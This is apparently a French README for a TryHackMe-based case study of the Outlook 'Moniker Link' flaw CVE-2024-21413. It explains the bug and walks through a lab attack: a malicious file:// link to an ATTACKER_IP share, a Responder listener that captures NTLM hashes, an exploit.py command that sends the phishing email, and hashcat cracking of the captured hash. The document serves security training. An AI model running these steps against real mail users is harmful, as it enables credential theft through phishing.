
Une étude de cas du CVE-2024-21413. Utilisé comme paramètre la salle TryHackMe Moniker Link (CVE-2024-21413). Des modifications ont été faites avec Claude code dans l'exploit.
⚠️ Avis juridique : Ce dépôt est exclusivement destiné à des fins éducatives et de recherche en sécurité. Toutes les démonstrations ont été réalisées dans des environnements contrôlés et isolés. L'utilisation de ces techniques contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.
| Champ | Détail |
|---|---|
| CVE | CVE-2024-21413 |
| Divulgation | 13 février 2024 (Patch Tuesday) |
| CVSS Score | 9.8 (Critique) |
| Produit | Microsoft Outlook |
| Type | RCE + Fuite d'identifiants (hash NTLM) |
| Vecteur | Réseau / E-mail (sans authentification préalable) |
| Interaction | Nécessite une interaction de l'utilisateur (clic sur le lien) |
| Surnom | Moniker Link |
La CVE-2024-21413 est une vulnérabilité critique dans Microsoft Outlook qui permet à un attaquant :
Le nom "Moniker Link" vient de l'exploitation des Monikers COM (Component Object Model) — un mécanisme Windows permettant de référencer des objets par chaîne — pour contourner les protections d'Outlook contre les liens file://.
Normalement, Outlook bloque les liens file:// pointant vers des ressources réseau, affichant un avertissement de sécurité (Protected View). La faille réside dans la façon dont Outlook traite les URL contenant le caractère ! — un séparateur de Moniker.
Un lien malveillant au format :
file:///\\ATTACKER_IP\share\!something
Le caractère ! fait que l'analyseur d'Outlook interprète l'URL comme une référence à un Moniker COM, ignorant les vérifications de sécurité normales. Le résultat :
L'attaquant envoie un e-mail → La victime clique sur le lien → Outlook traite l'URL avec "!"
→ Contournement de la Protected View → Connexion SMB automatique → Hash NTLM capturé
Pour reproduire cette étude de cas en toute sécurité :
| Machine | Système d'exploitation | Rôle |
|---|---|---|
| Attaquant | Kali Linux | Listener SMB + Exploit |
| Cible | Windows 10/11 avec Outlook vulnérable | Victime |
Important : Utilisez un réseau isolé (NAT ou Host-Only dans VirtualBox/VMware). Ne jamais exécuter sur des réseaux réels.
# Responder — listener SMB/HTTP pour la capture de hashes
sudo apt install responder
# Python 3 — pour exécuter l'exploit
python3 --version
# Vérifier la connectivité entre les machines
ping <IP_ALVO>
ip a | grep inet
# Notez l'IP de l'interface qui communique avec la cible (ex: 192.168.56.10)
Responder crée un faux serveur SMB qui capture les hashes d'authentification NTLM.
sudo responder -I eth0 -v
# Remplacez eth0 par votre interface réseau
Sortie attendue :
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash : usuario::DESKTOP-ALVO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVIDOR_EMAIL> \
--attacker-ip 192.168.56.10
Lorsque la victime ouvre l'e-mail et clique sur le lien, Responder capture automatiquement le hash NTLM. Ce hash peut être :
hashcat -m 5600 hash.txt wordlist.txt
Voir le fichier exploit.py pour le script complet et commenté.
Voir le fichier diagrama-ataque.html pour une visualisation interactive du flux complet de l'attaque.
Voir le fichier MITIGACAO.md pour le guide complet d'atténuation et de défense.
Voir le fichier CVE-BREAKDOWN.md pour l'analyse technique détaillée de la vulnérabilité.
Étude de cas développée dans le cadre d'une formation pratique en sécurité offensive via TryHackMe.
Ce projet suit les principes de responsible disclosure et d'ethical hacking. Tout le contenu présent ici vise l'éducation et l'amélioration de la posture de sécurité.